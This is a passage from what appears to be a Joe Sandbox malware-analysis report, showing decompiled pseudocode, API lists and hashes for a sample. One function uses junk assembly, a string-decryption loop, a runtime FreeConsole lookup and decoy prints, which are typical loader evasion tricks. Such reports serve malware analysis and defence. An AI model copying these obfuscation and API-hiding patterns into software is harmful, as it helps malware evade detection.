                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L11;
                                                                                                                                                                                                        			}










                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00BC2B33), ref: 00BC6602
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000), ref: 00BC6612
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000), ref: 00BC6629
                                                                                                                                                                                                        • CharNextA.USER32(00000000), ref: 00BC6635
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Prev$Next
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3260447230-0
                                                                                                                                                                                                        • Opcode ID: b2b9b9106d38e4c8afc71d11af7436acb4bcc8454cfa88c4be99b763772b6058
                                                                                                                                                                                                        • Instruction ID: 6a01f228214122614a5cf1ed52d856de66c4620fb0b4d0cfc6e0338730569e22
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b2b9b9106d38e4c8afc71d11af7436acb4bcc8454cfa88c4be99b763772b6058
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8F0A4324055506EE7321B299C8CEFBBFDCDF9B259B2D01FFE49593001DA650D468662
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC69B0() {
                                                                                                                                                                                                        				intOrPtr* _t4;
                                                                                                                                                                                                        				intOrPtr* _t5;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				intOrPtr _t11;
                                                                                                                                                                                                        				intOrPtr _t12;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				 *0xbc81f8 = E00BC6C70();
                                                                                                                                                                                                        				__set_app_type(E00BC6FBE(2));
                                                                                                                                                                                                        				 *0xbc88a4 =  *0xbc88a4 | 0xffffffff;
                                                                                                                                                                                                        				 *0xbc88a8 =  *0xbc88a8 | 0xffffffff;
                                                                                                                                                                                                        				_t4 = __p__fmode();
                                                                                                                                                                                                        				_t11 =  *0xbc8528; // 0x0
                                                                                                                                                                                                        				 *_t4 = _t11;
                                                                                                                                                                                                        				_t5 = __p__commode();
                                                                                                                                                                                                        				_t12 =  *0xbc851c; // 0x0
                                                                                                                                                                                                        				 *_t5 = _t12;
                                                                                                                                                                                                        				_t6 = E00BC7000();
                                                                                                                                                                                                        				if( *0xbc8000 == 0) {
                                                                                                                                                                                                        					__setusermatherr(E00BC7000);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E00BC71EF(_t6);
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00BC6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00BC6FC5
                                                                                                                                                                                                        • __set_app_type.MSVCRT ref: 00BC69C2
                                                                                                                                                                                                        • __p__fmode.MSVCRT ref: 00BC69D8
                                                                                                                                                                                                        • __p__commode.MSVCRT ref: 00BC69E6
                                                                                                                                                                                                        • __setusermatherr.MSVCRT ref: 00BC6A07
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1632413811-0
                                                                                                                                                                                                        • Opcode ID: c114d3506a7e386cb4e314c3c5d838b8ec06f87fec57fbf45cf22e74c1c84121
                                                                                                                                                                                                        • Instruction ID: 9d53b5bba228e9550ed1104c9b28c4fc9c6d4b3fcbd9dad86f0ddbe912dccfaf
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c114d3506a7e386cb4e314c3c5d838b8ec06f87fec57fbf45cf22e74c1c84121
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E4F092705483158FD759AB34ED1AF093BA1FB4C325B10069DE4629B2F1CF7A95458E11
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 66%
                                                                                                                                                                                                        			E0041CAF0(void* __eax) {
                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                                        				char _v17;
                                                                                                                                                                                                        				char _v18;
                                                                                                                                                                                                        				char _v19;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				char _v21;
                                                                                                                                                                                                        				char _v22;
                                                                                                                                                                                                        				char _v23;
                                                                                                                                                                                                        				char _v24;
                                                                                                                                                                                                        				char _v25;
                                                                                                                                                                                                        				char _v26;
                                                                                                                                                                                                        				char _v27;
                                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                        				char _v36;
                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _v44;
                                                                                                                                                                                                        				struct HINSTANCE__* _v48;
                                                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _v56;
                                                                                                                                                                                                        				signed int _v57;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v64;
                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _v68;
                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _v72;
                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _v76;
                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _v80;
                                                                                                                                                                                                        				signed int _v84;
                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t265;
                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t275;
                                                                                                                                                                                                        				void* _t277;
                                                                                                                                                                                                        				void* _t280;
                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t333;
                                                                                                                                                                                                        				void* _t408;
                                                                                                                                                                                                        				signed int _t418;
                                                                                                                                                                                                        				void* _t461;
                                                                                                                                                                                                        				void* _t462;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				asm("rcr edi, 0x5f");
                                                                                                                                                                                                        				asm("ror eax, 0xc8");
                                                                                                                                                                                                        				asm("bswap esi");
                                                                                                                                                                                                        				asm("ror esi, 0x6f");
                                                                                                                                                                                                        				asm("rcl edx, 0xc0");
                                                                                                                                                                                                        				asm("rol ebx, 0x9f");
                                                                                                                                                                                                        				asm("ror edi, 0xbe");
                                                                                                                                                                                                        				asm("bswap eax");
                                                                                                                                                                                                        				asm("rol ebx, 0x4b");
                                                                                                                                                                                                        				asm("ror edx, 0xd0");
                                                                                                                                                                                                        				asm("rol edx, 0x6e");
                                                                                                                                                                                                        				asm("rol edx, 0x80");
                                                                                                                                                                                                        				asm("rcr edx, 0xdf");
                                                                                                                                                                                                        				asm("bswap edi");
                                                                                                                                                                                                        				asm("rcl edi, 0x6f");
                                                                                                                                                                                                        				asm("rcr edi, 0xf3");
                                                                                                                                                                                                        				_t418 =  !( ~( !( !(_t408 + 1 - 1 + 0x37) - 0x59) & 0x000000ce));
                                                                                                                                                                                                        				_v28 = 0xe0;
                                                                                                                                                                                                        				_v27 = 0xe7;
                                                                                                                                                                                                        				_v26 = 0xbd;
                                                                                                                                                                                                        				_v25 = 0xa4;
                                                                                                                                                                                                        				_v24 = 0xdb;
                                                                                                                                                                                                        				_v23 = 0x11;
                                                                                                                                                                                                        				_v22 = 0x4c;
                                                                                                                                                                                                        				_v21 = 2;
                                                                                                                                                                                                        				_v20 = 0xe9;
                                                                                                                                                                                                        				_v19 = 0x2d;
                                                                                                                                                                                                        				_v18 = 0x93;
                                                                                                                                                                                                        				_v17 = 0xf9;
                                                                                                                                                                                                        				_v16 = 0x67;
                                                                                                                                                                                                        				_v56 = 0;
                                                                                                                                                                                                        				while(_v56 < 0xd) {
                                                                                                                                                                                                        					_v57 =  *((intOrPtr*)(_t461 + _v56 - 0x18));
                                                                                                                                                                                                        					_v57 =  !(_v57 & 0x000000ff);
                                                                                                                                                                                                        					_v57 = (_v57 & 0x000000ff) + 0x6b;
                                                                                                                                                                                                        					_v57 =  !(_v57 & 0x000000ff);
                                                                                                                                                                                                        					_v57 = _v56 + (_v57 & 0x000000ff);
                                                                                                                                                                                                        					_v57 =  !(_v57 & 0x000000ff);
                                                                                                                                                                                                        					_v57 = (_v57 & 0x000000ff) - _v56;
                                                                                                                                                                                                        					_v57 =  !(_v57 & 0x000000ff);
                                                                                                                                                                                                        					_v57 = (_v57 & 0x000000ff) - _v56;
                                                                                                                                                                                                        					_v57 =  ~(_v57 & 0x000000ff);
                                                                                                                                                                                                        					_v57 = (_v57 & 0x000000ff) + 0xb3;
                                                                                                                                                                                                        					_v57 = (_v57 & 0x000000ff) >> 0x00000006 | (_v57 & 0x000000ff) << 0x00000002;
                                                                                                                                                                                                        					_v57 =  !(_v57 & 0x000000ff);
                                                                                                                                                                                                        					_v57 = _v56 + (_v57 & 0x000000ff);
                                                                                                                                                                                                        					_v57 =  ~(_v57 & 0x000000ff);
                                                                                                                                                                                                        					_v57 = (_v57 & 0x000000ff) >> 0x00000005 | (_v57 & 0x000000ff) << 0x00000003;
                                                                                                                                                                                                        					_v57 =  !(_v57 & 0x000000ff);
                                                                                                                                                                                                        					_v57 =  ~(_v57 & 0x000000ff);
                                                                                                                                                                                                        					_v57 = (_v57 & 0x000000ff) - _v56;
                                                                                                                                                                                                        					_v57 =  ~(_v57 & 0x000000ff);
                                                                                                                                                                                                        					_v57 = (_v57 & 0x000000ff) >> 0x00000001 | (_v57 & 0x000000ff) << 0x00000007;
                                                                                                                                                                                                        					_v57 = _v56 + (_v57 & 0x000000ff);
                                                                                                                                                                                                        					_v57 =  !(_v57 & 0x000000ff);
                                                                                                                                                                                                        					_v57 =  ~(_v57 & 0x000000ff);
                                                                                                                                                                                                        					_v57 =  !(_v57 & 0x000000ff);
                                                                                                                                                                                                        					_v57 = (_v57 & 0x000000ff) + 0x85;
                                                                                                                                                                                                        					 *((char*)(_t461 + _v56 - 0x18)) = _v57;
                                                                                                                                                                                                        					_v56 =  &(_v56->nLength);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				CreateEventW(0, 0, 0, 0);
                                                                                                                                                                                                        				_v48 = GetModuleHandleA( &_v28);
                                                                                                                                                                                                        				__eflags = _v48;
                                                                                                                                                                                                        				if(_v48 != 0) {
                                                                                                                                                                                                        					_t335 = _v48;
                                                                                                                                                                                                        					_v64 = GetProcAddress(_v48, "FreeConsole");
                                                                                                                                                                                                        					__eflags = _v64;
                                                                                                                                                                                                        					if(_v64 == 0) {
                                                                                                                                                                                                        						_t277 = E0041DD00(_t335, 0x42a460, "Failed to retrieve function address.");
                                                                                                                                                                                                        						_t462 = _t462 + 8;
                                                                                                                                                                                                        						E0041D1B0(_t277, E0041D0B0);
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_v68 = _v64;
                                                                                                                                                                                                        						FreeConsole();
                                                                                                                                                                                                        						_t280 = E0041DD00(_t335, "xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "Console freed."); // executed
                                                                                                                                                                                                        						_t462 = _t462 + 8;
                                                                                                                                                                                                        						E0041D1B0(_t280, E0041D0B0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E0041D0D0( &_v36, 0x2a);
                                                                                                                                                                                                        				_t317 =  &_v36;
                                                                                                                                                                                                        				_v52 = E0041D0F0( &_v36);
                                                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                                                        				__eflags = _v12;
                                                                                                                                                                                                        				if(_v12 != 0) {
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						__eflags = _v12 - 0x14;
                                                                                                                                                                                                        						if(_v12 >= 0x14) {
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_v12 = _v12 + 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_v72 = 0;
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						__eflags = _v72 - 0xa;
                                                                                                                                                                                                        						if(_v72 >= 0xa) {
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t317 = _v72 + _v12;
                                                                                                                                                                                                        						_v12 = _v72 + _v12;
                                                                                                                                                                                                        						_t275 =  &(_v72->nLength);
                                                                                                                                                                                                        						__eflags = _t275;
                                                                                                                                                                                                        						_v72 = _t275;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L16:
                                                                                                                                                                                                        				E0041D1B0(E0041D1D0(E0041DD00(_t317, "xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "The value of x is: "), __eflags, _v12), E0041D0B0);
                                                                                                                                                                                                        				_v76 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					__eflags = _v76 - 5;
                                                                                                                                                                                                        					if(_v76 >= 5) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_v12 = _v12 << 1;
                                                                                                                                                                                                        					_v12 = _v12 - 3;
                                                                                                                                                                                                        					_t333 =  &(_v76->nLength);
                                                                                                                                                                                                        					__eflags = _t333;
                                                                                                                                                                                                        					_v76 = _t333;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t322 = E0041D1D0(E0041DD00(_v12, "xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "Now x is: "), __eflags, _v12);
                                                                                                                                                                                                        				E0041D1B0(_t224, E0041D0B0);
                                                                                                                                                                                                        				_v84 = _v12;
                                                                                                                                                                                                        				__eflags = _v84 - 1;
                                                                                                                                                                                                        				if(_v84 == 1) {
                                                                                                                                                                                                        					_t323 = E0041DD00(_t322, "xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "x is 1.");
                                                                                                                                                                                                        					E0041D1B0(_t226, E0041D0B0);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					__eflags = _v84 - 2;
                                                                                                                                                                                                        					if(_v84 == 2) {
                                                                                                                                                                                                        						_t323 = E0041DD00(_t322, "xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "x is 2.");
                                                                                                                                                                                                        						E0041D1B0(_t266, E0041D0B0);
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						__eflags = _v84 - 3;
                                                                                                                                                                                                        						if(_v84 == 3) {
                                                                                                                                                                                                        							_t323 = E0041DD00(_t322, "xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "x is 3.");
                                                                                                                                                                                                        							E0041D1B0(_t268, E0041D0B0);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t323 = E0041DD00(_t322, "xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "x is neither 1, 2, nor 3.");
                                                                                                                                                                                                        							E0041D1B0(_t270, E0041D0B0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_v44 = 0;
                                                                                                                                                                                                        				_v80 = 1;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					__eflags = _v80 - 0x64;
                                                                                                                                                                                                        					if(_v80 > 0x64) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t323 = _v44 + _v80;
                                                                                                                                                                                                        					_v44 = _v44 + _v80;
                                                                                                                                                                                                        					_t265 =  &(_v80->nLength);
                                                                                                                                                                                                        					__eflags = _t265;
                                                                                                                                                                                                        					_v80 = _t265;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E0041D1B0(E0041D1D0(E0041DD00(_t323, "xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "The sum of numbers from 1 to 100 is: "), __eflags, _v44), E0041D0B0);
                                                                                                                                                                                                        				_v8 = 0xa;
                                                                                                                                                                                                        				_v40 = 0x14;
                                                                                                                                                                                                        				_v32 = _v8;
                                                                                                                                                                                                        				_v8 = _v40;
                                                                                                                                                                                                        				_v40 = _v32;
                                                                                                                                                                                                        				E0041D1B0(E0041D1D0(E0041DD00(_t233, E0041D1D0(E0041DD00(_v8, "xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>", "After swapping, a is: "), __eflags, _v8), " and b is: "), __eflags, _v40), E0041D0B0);
                                                                                                                                                                                                        				asm("rcr edi, 0x5f");
                                                                                                                                                                                                        				asm("ror eax, 0xc8");
                                                                                                                                                                                                        				asm("bswap esi");
                                                                                                                                                                                                        				asm("ror esi, 0x6f");
                                                                                                                                                                                                        				asm("rcl edx, 0xc0");
                                                                                                                                                                                                        				asm("rol ebx, 0x9f");
                                                                                                                                                                                                        				asm("ror edi, 0xbe");
                                                                                                                                                                                                        				asm("bswap eax");
                                                                                                                                                                                                        				asm("rol ebx, 0x4b");
                                                                                                                                                                                                        				asm("ror edx, 0xd0");
                                                                                                                                                                                                        				asm("rol edx, 0x6e");
                                                                                                                                                                                                        				asm("rol edx, 0x80");
                                                                                                                                                                                                        				asm("rcr edx, 0xdf");
                                                                                                                                                                                                        				asm("bswap edi");
                                                                                                                                                                                                        				asm("rcl edi, 0x6f");
                                                                                                                                                                                                        				asm("rcr edi, 0xf3");
                                                                                                                                                                                                        				E00419140(( !((0 * (_t418 + 1 - 1 + 0x37) + 0x3d) * (0 * (_t418 + 1 - 1 + 0x37) + 0x3d)) * (((0 * (_t418 + 0x00000001 - 0x00000001 + 0x37) + 0x3d) * (0 * (_t418 + 0x00000001 - 0x00000001 + 0x37) + 0x3d) >> 0x00000020) - 0x00000001) & 0x000000db) - 0xfc); // executed
                                                                                                                                                                                                        				asm("rcr edi, 0x5f");
                                                                                                                                                                                                        				asm("ror eax, 0xc8");
                                                                                                                                                                                                        				asm("bswap esi");
                                                                                                                                                                                                        				asm("ror esi, 0x6f");
                                                                                                                                                                                                        				asm("rcl edx, 0xc0");
                                                                                                                                                                                                        				asm("rol ebx, 0x9f");
                                                                                                                                                                                                        				asm("ror edi, 0xbe");
                                                                                                                                                                                                        				asm("bswap eax");
                                                                                                                                                                                                        				asm("rol ebx, 0x4b");
                                                                                                                                                                                                        				asm("ror edx, 0xd0");
                                                                                                                                                                                                        				asm("rol edx, 0x6e");
                                                                                                                                                                                                        				asm("rol edx, 0x80");
                                                                                                                                                                                                        				asm("rcr edx, 0xdf");
                                                                                                                                                                                                        				asm("bswap edi");
                                                                                                                                                                                                        				asm("rcl edi, 0x6f");
                                                                                                                                                                                                        				asm("rcr edi, 0xf3");
                                                                                                                                                                                                        				__eflags = 0;
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}
                                                                                                                                                                                                        0x0041ccc0
                                                                                                                                                                                                        0x0041ccc9
                                                                                                                                                                                                        0x0041ccd2
                                                                                                                                                                                                        0x0041ccde
                                                                                                                                                                                                        0x0041cce7
                                                                                                                                                                                                        0x0041cbbf
                                                                                                                                                                                                        0x0041cbbf
                                                                                                                                                                                                        0x0041ccf8
                                                                                                                                                                                                        0x0041cd08
                                                                                                                                                                                                        0x0041cd0b
                                                                                                                                                                                                        0x0041cd0f
                                                                                                                                                                                                        0x0041cd16
                                                                                                                                                                                                        0x0041cd20
                                                                                                                                                                                                        0x0041cd23
                                                                                                                                                                                                        0x0041cd27
                                                                                                                                                                                                        0x0041cd61
                                                                                                                                                                                                        0x0041cd66
                                                                                                                                                                                                        0x0041cd6b
                                                                                                                                                                                                        0x0041cd29
                                                                                                                                                                                                        0x0041cd2c
                                                                                                                                                                                                        0x0041cd2f
                                                                                                                                                                                                        0x0041cd41
                                                                                                                                                                                                        0x0041cd46
                                                                                                                                                                                                        0x0041cd4b
                                                                                                                                                                                                        0x0041cd4b
                                                                                                                                                                                                        0x0041cd27
                                                                                                                                                                                                        0x0041cd75
                                                                                                                                                                                                        0x0041cd7a
                                                                                                                                                                                                        0x0041cd82
                                                                                                                                                                                                        0x0041cd85
                                                                                                                                                                                                        0x0041cd8c
                                                                                                                                                                                                        0x0041cd90
                                                                                                                                                                                                        0x0041cdb7
                                                                                                                                                                                                        0x0041cdb7
                                                                                                                                                                                                        0x0041cdbb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041cdc3
                                                                                                                                                                                                        0x0041cdc3
                                                                                                                                                                                                        0x0041cd92
                                                                                                                                                                                                        0x0041cd92
                                                                                                                                                                                                        0x0041cda4
                                                                                                                                                                                                        0x0041cda4
                                                                                                                                                                                                        0x0041cda8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041cdad
                                                                                                                                                                                                        0x0041cdb0
                                                                                                                                                                                                        0x0041cd9e
                                                                                                                                                                                                        0x0041cd9e
                                                                                                                                                                                                        0x0041cda1
                                                                                                                                                                                                        0x0041cda1
                                                                                                                                                                                                        0x0041cdb5
                                                                                                                                                                                                        0x0041cdc8
                                                                                                                                                                                                        0x0041cdec
                                                                                                                                                                                                        0x0041cdf1
                                                                                                                                                                                                        0x0041ce03
                                                                                                                                                                                                        0x0041ce03
                                                                                                                                                                                                        0x0041ce07
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041ce0e
                                                                                                                                                                                                        0x0041ce17
                                                                                                                                                                                                        0x0041cdfd
                                                                                                                                                                                                        0x0041cdfd
                                                                                                                                                                                                        0x0041ce00
                                                                                                                                                                                                        0x0041ce00
                                                                                                                                                                                                        0x0041ce3e
                                                                                                                                                                                                        0x0041ce40
                                                                                                                                                                                                        0x0041ce48
                                                                                                                                                                                                        0x0041ce4b
                                                                                                                                                                                                        0x0041ce4f
                                                                                                                                                                                                        0x0041ce76
                                                                                                                                                                                                        0x0041ce78
                                                                                                                                                                                                        0x0041ce51
                                                                                                                                                                                                        0x0041ce51
                                                                                                                                                                                                        0x0041ce55
                                                                                                                                                                                                        0x0041ce96
                                                                                                                                                                                                        0x0041ce98
                                                                                                                                                                                                        0x0041ce57
                                                                                                                                                                                                        0x0041ce57
                                                                                                                                                                                                        0x0041ce5b
                                                                                                                                                                                                        0x0041ceb6
                                                                                                                                                                                                        0x0041ceb8
                                                                                                                                                                                                        0x0041ce5d
                                                                                                                                                                                                        0x0041ced6
                                                                                                                                                                                                        0x0041ced8
                                                                                                                                                                                                        0x0041ced8
                                                                                                                                                                                                        0x0041ce5b
                                                                                                                                                                                                        0x0041ce55
                                                                                                                                                                                                        0x0041cedd
                                                                                                                                                                                                        0x0041cee4
                                                                                                                                                                                                        0x0041cef6
                                                                                                                                                                                                        0x0041cef6
                                                                                                                                                                                                        0x0041cefa
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041ceff
                                                                                                                                                                                                        0x0041cf02
                                                                                                                                                                                                        0x0041cef0
                                                                                                                                                                                                        0x0041cef0
                                                                                                                                                                                                        0x0041cef3
                                                                                                                                                                                                        0x0041cef3
                                                                                                                                                                                                        0x0041cf2b
                                                                                                                                                                                                        0x0041cf30
                                                                                                                                                                                                        0x0041cf37
                                                                                                                                                                                                        0x0041cf41
                                                                                                                                                                                                        0x0041cf47
                                                                                                                                                                                                        0x0041cf4d
                                                                                                                                                                                                        0x0041cf8d
                                                                                                                                                                                                        0x0041cf94
                                                                                                                                                                                                        0x0041cf99
                                                                                                                                                                                                        0x0041cfa1
                                                                                                                                                                                                        0x0041cfad
                                                                                                                                                                                                        0x0041cfb9
                                                                                                                                                                                                        0x0041cfbd
                                                                                                                                                                                                        0x0041cfc9
                                                                                                                                                                                                        0x0041cfcc
                                                                                                                                                                                                        0x0041cfd5
                                                                                                                                                                                                        0x0041cfe3
                                                                                                                                                                                                        0x0041cfe6
                                                                                                                                                                                                        0x0041cfe9
                                                                                                                                                                                                        0x0041cff7
                                                                                                                                                                                                        0x0041cffa
                                                                                                                                                                                                        0x0041cffc
                                                                                                                                                                                                        0x0041d008
                                                                                                                                                                                                        0x0041d015
                                                                                                                                                                                                        0x0041d01c
                                                                                                                                                                                                        0x0041d021
                                                                                                                                                                                                        0x0041d029
                                                                                                                                                                                                        0x0041d035
                                                                                                                                                                                                        0x0041d041

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041CCF8
                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(000000E0), ref: 0041CD02
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FreeConsole), ref: 0041CD1A
                                                                                                                                                                                                        • FreeConsole.KERNELBASE ref: 0041CD2F
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressConsoleCreateEventFreeHandleModuleProc
                                                                                                                                                                                                        • String ID: and b is: $-$After swapping, a is: $Console freed.$Failed to retrieve function address.$FreeConsole$L$Now x is: $The sum of numbers from 1 to 100 is: $The value of x is: $d$g$x is 1.$x is 2.$x is 3.$x is neither 1, 2, nor 3.
                                                                                                                                                                                                        • API String ID: 3483339890-386409390
